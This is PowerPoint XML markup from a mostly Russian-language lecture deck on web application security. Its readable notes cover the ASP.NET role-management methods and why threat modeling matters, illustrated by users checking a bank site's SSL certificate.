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5"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="285" r:id="rId2"/>
    <p:sldId id="506" r:id="rId3"/>
    <p:sldId id="507" r:id="rId4"/>
    <p:sldId id="497" r:id="rId5"/>
    <p:sldId id="498" r:id="rId6"/>
    <p:sldId id="499" r:id="rId7"/>
    <p:sldId id="500" r:id="rId8"/>
    <p:sldId id="501" r:id="rId9"/>
    <p:sldId id="502" r:id="rId10"/>
    <p:sldId id="503" r:id="rId11"/>
    <p:sldId id="504" r:id="rId12"/>
    <p:sldId id="505" r:id="rId13"/>
    <p:sldId id="286" r:id="rId14"/>
    <p:sldId id="343" r:id="rId15"/>
    <p:sldId id="377" r:id="rId16"/>
    <p:sldId id="378" r:id="rId17"/>
    <p:sldId id="344" r:id="rId18"/>
    <p:sldId id="472" r:id="rId19"/>
    <p:sldId id="345" r:id="rId20"/>
    <p:sldId id="288" r:id="rId21"/>
    <p:sldId id="379" r:id="rId22"/>
    <p:sldId id="289" r:id="rId23"/>
    <p:sldId id="290" r:id="rId24"/>
    <p:sldId id="291" r:id="rId25"/>
    <p:sldId id="292" r:id="rId26"/>
    <p:sldId id="376" r:id="rId27"/>
    <p:sldId id="293" r:id="rId28"/>
    <p:sldId id="380" r:id="rId29"/>
    <p:sldId id="294" r:id="rId30"/>
    <p:sldId id="295" r:id="rId31"/>
    <p:sldId id="296" r:id="rId32"/>
    <p:sldId id="297" r:id="rId33"/>
    <p:sldId id="381" r:id="rId34"/>
    <p:sldId id="382" r:id="rId35"/>
    <p:sldId id="347" r:id="rId36"/>
    <p:sldId id="383" r:id="rId37"/>
    <p:sldId id="385" r:id="rId38"/>
    <p:sldId id="287" r:id="rId39"/>
    <p:sldId id="386" r:id="rId40"/>
    <p:sldId id="384" r:id="rId41"/>
    <p:sldId id="348" r:id="rId42"/>
    <p:sldId id="349" r:id="rId43"/>
    <p:sldId id="415" r:id="rId44"/>
    <p:sldId id="485" r:id="rId45"/>
    <p:sldId id="299" r:id="rId46"/>
    <p:sldId id="300" r:id="rId47"/>
    <p:sldId id="390" r:id="rId48"/>
    <p:sldId id="391" r:id="rId49"/>
    <p:sldId id="301" r:id="rId50"/>
    <p:sldId id="302" r:id="rId51"/>
    <p:sldId id="392" r:id="rId52"/>
    <p:sldId id="357" r:id="rId53"/>
    <p:sldId id="478" r:id="rId54"/>
    <p:sldId id="393" r:id="rId55"/>
    <p:sldId id="494" r:id="rId56"/>
    <p:sldId id="495" r:id="rId57"/>
    <p:sldId id="394" r:id="rId58"/>
    <p:sldId id="407" r:id="rId59"/>
    <p:sldId id="473" r:id="rId60"/>
    <p:sldId id="474" r:id="rId61"/>
    <p:sldId id="475" r:id="rId62"/>
    <p:sldId id="476" r:id="rId63"/>
    <p:sldId id="477" r:id="rId64"/>
    <p:sldId id="416" r:id="rId65"/>
    <p:sldId id="303" r:id="rId66"/>
    <p:sldId id="306" r:id="rId67"/>
    <p:sldId id="304" r:id="rId68"/>
    <p:sldId id="305" r:id="rId69"/>
    <p:sldId id="257" r:id="rId70"/>
    <p:sldId id="493" r:id="rId71"/>
    <p:sldId id="490" r:id="rId72"/>
    <p:sldId id="488" r:id="rId73"/>
    <p:sldId id="489" r:id="rId74"/>
    <p:sldId id="491" r:id="rId75"/>
    <p:sldId id="492" r:id="rId76"/>
    <p:sldId id="479" r:id="rId77"/>
    <p:sldId id="480" r:id="rId78"/>
    <p:sldId id="481" r:id="rId79"/>
    <p:sldId id="482" r:id="rId80"/>
    <p:sldId id="496" r:id="rId81"/>
    <p:sldId id="483" r:id="rId82"/>
    <p:sldId id="484" r:id="rId83"/>
    <p:sldId id="451" r:id="rId84"/>
    <p:sldId id="487" r:id="rId85"/>
    <p:sldId id="452" r:id="rId86"/>
    <p:sldId id="352" r:id="rId87"/>
    <p:sldId id="454" r:id="rId88"/>
    <p:sldId id="307" r:id="rId89"/>
    <p:sldId id="308" r:id="rId90"/>
    <p:sldId id="309" r:id="rId91"/>
    <p:sldId id="310" r:id="rId92"/>
    <p:sldId id="311" r:id="rId93"/>
    <p:sldId id="443" r:id="rId94"/>
    <p:sldId id="434" r:id="rId95"/>
    <p:sldId id="442" r:id="rId96"/>
    <p:sldId id="449" r:id="rId97"/>
    <p:sldId id="447" r:id="rId98"/>
    <p:sldId id="453" r:id="rId99"/>
    <p:sldId id="435" r:id="rId100"/>
    <p:sldId id="458" r:id="rId101"/>
    <p:sldId id="459" r:id="rId102"/>
    <p:sldId id="455" r:id="rId103"/>
    <p:sldId id="456" r:id="rId104"/>
    <p:sldId id="457" r:id="rId105"/>
    <p:sldId id="436" r:id="rId106"/>
    <p:sldId id="438" r:id="rId107"/>
    <p:sldId id="312" r:id="rId108"/>
    <p:sldId id="445" r:id="rId109"/>
    <p:sldId id="446" r:id="rId110"/>
    <p:sldId id="313" r:id="rId111"/>
    <p:sldId id="444" r:id="rId112"/>
    <p:sldId id="315" r:id="rId113"/>
    <p:sldId id="316" r:id="rId114"/>
    <p:sldId id="317" r:id="rId115"/>
    <p:sldId id="364" r:id="rId116"/>
    <p:sldId id="318" r:id="rId117"/>
    <p:sldId id="401" r:id="rId118"/>
    <p:sldId id="402" r:id="rId119"/>
    <p:sldId id="432" r:id="rId120"/>
    <p:sldId id="427" r:id="rId121"/>
    <p:sldId id="428" r:id="rId122"/>
    <p:sldId id="429" r:id="rId123"/>
    <p:sldId id="430" r:id="rId124"/>
    <p:sldId id="431" r:id="rId125"/>
    <p:sldId id="260" r:id="rId126"/>
    <p:sldId id="406" r:id="rId127"/>
    <p:sldId id="403" r:id="rId128"/>
    <p:sldId id="405" r:id="rId129"/>
    <p:sldId id="404" r:id="rId130"/>
    <p:sldId id="417" r:id="rId131"/>
    <p:sldId id="418" r:id="rId132"/>
    <p:sldId id="419" r:id="rId133"/>
    <p:sldId id="420" r:id="rId134"/>
    <p:sldId id="421" r:id="rId135"/>
    <p:sldId id="422" r:id="rId136"/>
    <p:sldId id="423" r:id="rId137"/>
    <p:sldId id="424" r:id="rId138"/>
    <p:sldId id="323" r:id="rId139"/>
    <p:sldId id="450" r:id="rId140"/>
    <p:sldId id="326" r:id="rId141"/>
    <p:sldId id="324" r:id="rId142"/>
    <p:sldId id="325" r:id="rId143"/>
    <p:sldId id="327" r:id="rId14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5" autoAdjust="0"/>
    <p:restoredTop sz="79270" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="69" d="100"/>
          <a:sy n="69" d="100"/>
        </p:scale>
        <p:origin x="-201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22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ru-RU"/>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ru-RU"/>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ru-RU"/>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1BD5AF3-78F1-413F-8F96-636109030E71}"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0A3AD73-2023-4E32-9F23-4B343887B6EA}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{811B284B-9CCC-461E-8BCE-03BE7766D7C8}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>1/31/2010 3:43 PM</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158723" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>©2005 Microsoft Corporation. All rights reserved.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158724" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8B334332-B872-45A4-94B8-BC83C4A0FA21}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158725" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15872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E9B42CC2-3C5E-4D3D-8768-03F85564BEFE}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>102</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>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buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="1" smtClean="0"/>
              <a:t>AddUserToRole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="1" smtClean="0"/>
              <a:t>AddUsersToRoles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="1" smtClean="0"/>
              <a:t>AddUsersToRole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" smtClean="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="1" smtClean="0"/>
              <a:t>AddUsersToRoles </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>Adds a user to a role </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="1" smtClean="0"/>
              <a:t>- RemoveUserFromRole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="1" smtClean="0"/>
              <a:t>RemoveUsersFromRole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="1" smtClean="0"/>
              <a:t>RemoveUserFromRoles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" smtClean="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="1" smtClean="0"/>
              <a:t>RemoveUsersFromRoles </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>Removes a user from a role</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="ru-RU"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40F4DC9F-2A35-45AF-BCEF-DC3125D510B1}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>103</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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CF9C94C5-F74F-4B38-9915-6DD62A105968}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>104</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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8FE14B95-88BF-4356-AB7A-4AE6FD252BF5}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>105</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>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597F1091-61BA-4C29-905E-1968270CDAFF}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>106</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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0840696E-A974-4301-ADF8-5036E1F12BE1}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>107</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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9106BECB-E3BC-4548-B782-C35D56647C6A}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>108</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>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95597799-FC97-4969-AC19-13B6DBCE31D1}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>109</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>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20D41542-2B39-4855-AA49-00046D59843B}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>110</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>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D830BB80-333E-4739-A916-4CCB32AC6F44}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>111</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>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861AE8C-446A-4C73-BA87-F643EFAF667F}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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9733276A-29EC-4C04-A0DC-41107107DC3D}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>112</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>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D1292ED4-4E10-4CBC-AEE1-F81DAE9AB03A}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>113</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>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AE39A1DA-1520-4444-B171-41D085835537}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>114</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>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C99A142F-71B5-4660-B4DE-A73E583665F2}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>115</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="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C3352627-5649-4C48-B068-B5DCDB097B39}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>116</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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0DA1EF0C-5824-4B89-99CB-50D2B7EB78A7}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>117</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>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1F2C9E2E-C64A-428F-A7FB-BED85E5529AD}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>118</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>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61B071DB-ED48-4EBE-B21E-6CAF550F8E05}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>119</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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5EC67EA9-3EE5-43A1-9C31-B208CACF6E0C}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>120</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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876A8874-6DB4-427F-ADAA-D6B289529D4A}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>121</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>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7C9DA46E-4605-4ECD-9B23-560F4845E926}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>But threat modeling is important for another reason. As you probably know, not all potential threats can be mitigated with security technologies such as authentication or authorization. In other words, some of them can’t be solved technically. For example, a bank’s online solution can use SSL for securing traffic on its website. But how do users know they are actually using the bank’s page and not</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>a hacker’s fake website? Well, the only way to know this is to look at the certificate used for establishing the SSL channel. But users have to be aware of that, and therefore you have to inform them of this somehow. So, the “mitigation technique” is not a security technology. It just involves making sure all your registered users know how to look at the certificate. (Of course, you can’t force them to do so, but if your information is designed appropriately, you might get most of them to do it.) Threat modeling as an analysis method helps you determine issues such as these, not merely the technical issues.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="ru-RU"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03B00E16-B7BA-490E-A36C-76135BBF6329}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>122</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>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745B3E0F-6120-4E49-BF3C-CF013B33D317}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>123</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>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4100D00D-5B83-4CA5-890F-F19E669370F5}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>124</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>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928EFAE5-518E-468B-B6B8-6CE14546A283}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>125</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>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6659B1FF-CFA8-4104-A207-D32F4C07BBCA}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>126</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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62418AD0-8CFE-43D4-9483-0F143C8BADFE}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>127</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>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87CD2AEF-EA22-4FE5-8AA6-313BD91C0D20}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>128</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>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15BD4395-37A0-4AA5-809E-1D7B24F16523}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>129</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>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120FF917-CAB5-42D8-B214-354D3CA64152}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>130</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>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87A9B059-B862-4C21-A1FF-4487D0989245}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>131</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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DA004368-E7B1-4882-A447-BA2B2F8DAD08}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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D8110B1E-5DC7-4D67-BAB1-0C0CAFD4B6DA}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>132</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>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AF3F1509-CD43-48FC-A27B-A1D3DD3B1F52}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>133</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>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003535C4-C64C-4BA1-8B40-AF1CBAAF8B5C}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>134</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>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2195D002-0521-4ED4-BBA3-8DB45123C6B6}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>135</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>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FFD5A5F9-A826-41E7-ADEE-862B2FA1DDC3}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>136</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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DCD53D67-E111-40E5-B039-E08EC4E4CF22}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>137</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>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CA406147-AE10-43FD-948E-4731DA9CFE59}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>138</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>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B3F477B3-F850-4974-B127-4EB640F2BD79}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>139</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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5B4B948-C7FB-4AAE-9057-0BCB86B8FCAC}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>140</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>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27F12EDE-C17A-4428-8802-AB14AEFD75F1}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>141</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>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179EDF52-8D8D-43F5-AB99-CA09E9BC7A83}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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168BE1B8-9243-417D-895A-4E36ECAD0888}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>142</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>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BBA83481-351D-42DD-9215-855426454308}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>143</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>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567F00BE-2B75-45AC-AF89-4E06365554D1}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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9909448D-2AC7-42B9-8A52-DF3A0477B697}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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0DD1CD20-11DF-4575-87ED-6476FFE94C13}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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04D4D615-D514-473D-A0C2-3CA5AA5DF0D0}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>В общем случае, для обычных web приложений, базовые задачи реализации безопасности всегда одни и теже:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="ru-R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1F96744C-C994-4E76-B177-FF234E7EB131}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0F6B6A6B-0E66-4741-8E99-3D69189FE460}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>1/31/2010 3:43 PM</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150531" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>©2005 Microsoft Corporation. All rights reserved.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150532" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{99E9C9E0-8CCD-4D2F-A6B5-CD8B6498ABE2}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150533" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15053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4E626968-1E03-4487-9D3E-D06D471E3419}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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69745948-D50A-4B6C-8379-B70ECD34613A}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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C8D0966B-BB5A-494F-AA0E-EA63A3B2F901}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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E98943E1-D353-4A3B-BDC7-45AB7F51650A}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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975BE4CC-3099-4FFF-8F23-9372894CC480}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17305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BB77747-41CD-46F1-ABC3-1972A4771D77}" type="slidenum">
              <a:rPr lang="ru-RU" sz="1200"/>
              <a:pPr algn="r"/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" sz="1200"/>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FD27AE54-E457-4980-AEA2-4CDF3FC0CE10}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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5102A06D-E02F-4067-92D3-403ABF12F912}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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EC153C1B-7577-4173-AA23-C968D5C79DB4}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
